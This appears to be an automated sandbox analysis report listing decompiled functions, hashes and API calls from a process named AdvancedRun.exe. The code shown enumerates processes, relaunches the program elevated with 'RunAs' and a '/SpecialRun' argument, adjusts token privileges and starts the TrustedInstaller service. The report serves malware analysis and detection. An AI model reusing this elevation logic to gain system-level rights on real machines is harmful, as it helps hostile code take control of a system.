                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1c0c943071c9e0932bdeb05cc1070a908570370a60557241509701b57c77ecaf
                                                                                                                                                                                                                          • Instruction ID: b3d9b2c2c736523f6b7080db519df5da1c3449a0f4a563d4a3cdf3c17cab63f6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c0c943071c9e0932bdeb05cc1070a908570370a60557241509701b57c77ecaf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF12EAF1421B468BD330CF65E9981893BA1B74532AF92420CD2B19FAD9E7F4016EEF44
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015DB294, Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3b1d0c926a7c3c2ad5a976521b8cb01ff637b2be26173b111031b9caf559627c
                                                                                                                                                                                                                          • Instruction ID: ebea4ecde9dc598767c0297b15f6e25ec9de15d95200ad17fdb41c12e529e882
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b1d0c926a7c3c2ad5a976521b8cb01ff637b2be26173b111031b9caf559627c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92A18D32E0021ACFCF25DFA9C9445DDBBB6FF89300B15856AE905BF265EB31A905CB40
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 015DDB30, Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 46ff22e89dd4ceef1df6787480d5de51cdab8ecb6b822e02f7ede8b81cd0103b
                                                                                                                                                                                                                          • Instruction ID: d391c197f20f295daf65af21dc99f8956319123de7b8569a2d0e1355a92f2307
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46ff22e89dd4ceef1df6787480d5de51cdab8ecb6b822e02f7ede8b81cd0103b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51C13AB18217468BD724DF64E9881893BB1BB45329F62430CD2B1AF6D8F7B4116EEF44
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Analysis Process: AdvancedRun.exe PID: 6584 Parent PID: 984 AdvancedRun.exeCOMMON

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}































                                                                                                                                                                                                                          0x00409609
                                                                                                                                                                                                                          0x0040960f
                                                                                                                                                                                                                          0x00409619
                                                                                                                                                                                                                          0x00409623
                                                                                                                                                                                                                          0x0040962e
                                                                                                                                                                                                                          0x00409633
                                                                                                                                                                                                                          0x00409640
                                                                                                                                                                                                                          0x0040964a
                                                                                                                                                                                                                          0x00409782
                                                                                                                                                                                                                          0x0040978c
                                                                                                                                                                                                                          0x00409793
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040965a
                                                                                                                                                                                                                          0x0040965f
                                                                                                                                                                                                                          0x00409678
                                                                                                                                                                                                                          0x0040967e
                                                                                                                                                                                                                          0x00409681
                                                                                                                                                                                                                          0x00409685
                                                                                                                                                                                                                          0x00409688
                                                                                                                                                                                                                          0x004096b2
                                                                                                                                                                                                                          0x004096bf
                                                                                                                                                                                                                          0x004096c6
                                                                                                                                                                                                                          0x004096cb
                                                                                                                                                                                                                          0x004096da
                                                                                                                                                                                                                          0x004096e6
                                                                                                                                                                                                                          0x0040973b
                                                                                                                                                                                                                          0x00409747
                                                                                                                                                                                                                          0x0040975f
                                                                                                                                                                                                                          0x00409764
                                                                                                                                                                                                                          0x0040976a
                                                                                                                                                                                                                          0x00409770
                                                                                                                                                                                                                          0x00409773
                                                                                                                                                                                                                          0x0040977d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040977d
                                                                                                                                                                                                                          0x004096ee
                                                                                                                                                                                                                          0x004096f5
                                                                                                                                                                                                                          0x004096fc
                                                                                                                                                                                                                          0x00409704
                                                                                                                                                                                                                          0x0040970c
                                                                                                                                                                                                                          0x0040971c
                                                                                                                                                                                                                          0x0040971c
                                                                                                                                                                                                                          0x00409704
                                                                                                                                                                                                                          0x00409721
                                                                                                                                                                                                                          0x00409728
                                                                                                                                                                                                                          0x00409739
                                                                                                                                                                                                                          0x00409739
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409728
                                                                                                                                                                                                                          0x00409693
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004096a5
                                                                                                                                                                                                                          0x004096a9
                                                                                                                                                                                                                          0x004096ac
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004096ac
                                                                                                                                                                                                                          0x004097a6

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040962E
                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004096C6
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                                                                                                                          • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                                                                                                                          • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 239888749-1740548384
                                                                                                                                                                                                                          • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                                                                          • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                                                                                                                                                                          0x00401c31
                                                                                                                                                                                                                          0x00401c33
                                                                                                                                                                                                                          0x00401c48
                                                                                                                                                                                                                          0x00401c4f
                                                                                                                                                                                                                          0x00401c61
                                                                                                                                                                                                                          0x00401c68
                                                                                                                                                                                                                          0x00401c74
                                                                                                                                                                                                                          0x00401c79
                                                                                                                                                                                                                          0x00401c7a
                                                                                                                                                                                                                          0x00401c7b
                                                                                                                                                                                                                          0x00401c84
                                                                                                                                                                                                                          0x00401c89
                                                                                                                                                                                                                          0x00401c8e
                                                                                                                                                                                                                          0x00401c8f
                                                                                                                                                                                                                          0x00401c9b
                                                                                                                                                                                                                          0x00401ca6
                                                                                                                                                                                                                          0x00401caf
                                                                                                                                                                                                                          0x00401cb9
                                                                                                                                                                                                                          0x00401cc0
                                                                                                                                                                                                                          0x00401cc7
                                                                                                                                                                                                                          0x00401cce
                                                                                                                                                                                                                          0x00401cd5
                                                                                                                                                                                                                          0x00401cdd
                                                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                                                          0x00401d14
                                                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                                                          0x00401ce8
                                                                                                                                                                                                                          0x00401cf3
                                                                                                                                                                                                                          0x00401cf6
                                                                                                                                                                                                                          0x00401cfe
                                                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                                                          0x00401cfe
                                                                                                                                                                                                                          0x00401d1b

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C4F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C68
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C9B
                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                                                                                                                          • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                                                                                                                          • API String ID: 903100921-3385179869
                                                                                                                                                                                                                          • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                                                                          • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                                                                                                                          0x00408fc9
                                                                                                                                                                                                                          0x00408fd0
                                                                                                                                                                                                                          0x00408fe8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408fea
                                                                                                                                                                                                                          0x00408ff4
                                                                                                                                                                                                                          0x00409001
                                                                                                                                                                                                                          0x00409003
                                                                                                                                                                                                                          0x0040900c
                                                                                                                                                                                                                          0x0040900e
                                                                                                                                                                                                                          0x00409010
                                                                                                                                                                                                                          0x0040901a
                                                                                                                                                                                                                          0x0040901a
                                                                                                                                                                                                                          0x00409010
                                                                                                                                                                                                                          0x0040901f
                                                                                                                                                                                                                          0x00409026
                                                                                                                                                                                                                          0x0040902d
                                                                                                                                                                                                                          0x00409030
                                                                                                                                                                                                                          0x00409035
                                                                                                                                                                                                                          0x00409037
                                                                                                                                                                                                                          0x00409040
                                                                                                                                                                                                                          0x00409042
                                                                                                                                                                                                                          0x00409044
                                                                                                                                                                                                                          0x00409051
                                                                                                                                                                                                                          0x00409051
                                                                                                                                                                                                                          0x00409044
                                                                                                                                                                                                                          0x00409053
                                                                                                                                                                                                                          0x0040905e
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                                                                            • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                                                                                                                          • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                                                                                                                          • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                                                                                                                          • API String ID: 616250965-1253513912
                                                                                                                                                                                                                          • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                                                                          • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                                                                                                                          0x00401319
                                                                                                                                                                                                                          0x0040131b
                                                                                                                                                                                                                          0x00401327
                                                                                                                                                                                                                          0x0040132b
                                                                                                                                                                                                                          0x0040133a
                                                                                                                                                                                                                          0x0040134b
                                                                                                                                                                                                                          0x0040134b
                                                                                                                                                                                                                          0x0040134e
                                                                                                                                                                                                                          0x0040134e
                                                                                                                                                                                                                          0x00401353
                                                                                                                                                                                                                          0x0040135b

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                                                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                                                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                                                                                                                          • String ID: TrustedInstaller
                                                                                                                                                                                                                          • API String ID: 862991418-565535830
                                                                                                                                                                                                                          • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                                                                          • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                                                                                                                          0x0040a348
                                                                                                                                                                                                                          0x0040a34e
                                                                                                                                                                                                                          0x0040a352
                                                                                                                                                                                                                          0x0040a35f
                                                                                                                                                                                                                          0x0040a363
                                                                                                                                                                                                                          0x0040a369
                                                                                                                                                                                                                          0x0040a371
                                                                                                                                                                                                                          0x0040a374
                                                                                                                                                                                                                          0x0040a37c
                                                                                                                                                                                                                          0x0040a380
                                                                                                                                                                                                                          0x0040a383
                                                                                                                                                                                                                          0x0040a386
                                                                                                                                                                                                                          0x0040a388
                                                                                                                                                                                                                          0x0040a388
                                                                                                                                                                                                                          0x0040a38c
                                                                                                                                                                                                                          0x0040a38f
                                                                                                                                                                                                                          0x0040a39f
                                                                                                                                                                                                                          0x0040a3a1
                                                                                                                                                                                                                          0x0040a3a5
                                                                                                                                                                                                                          0x0040a3a5
                                                                                                                                                                                                                          0x0040a3a9
                                                                                                                                                                                                                          0x0040a3aa
                                                                                                                                                                                                                          0x0040a3b3
                                                                                                                                                                                                                          0x0040a3b3
                                                                                                                                                                                                                          0x0040a37c
                                                                                                                                                                                                                          0x0040a371
                                                                                                                                                                                                                          0x0040a3b8
                                                                                                                                                                                                                          0x0040a3be

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                          • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                                                                          • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
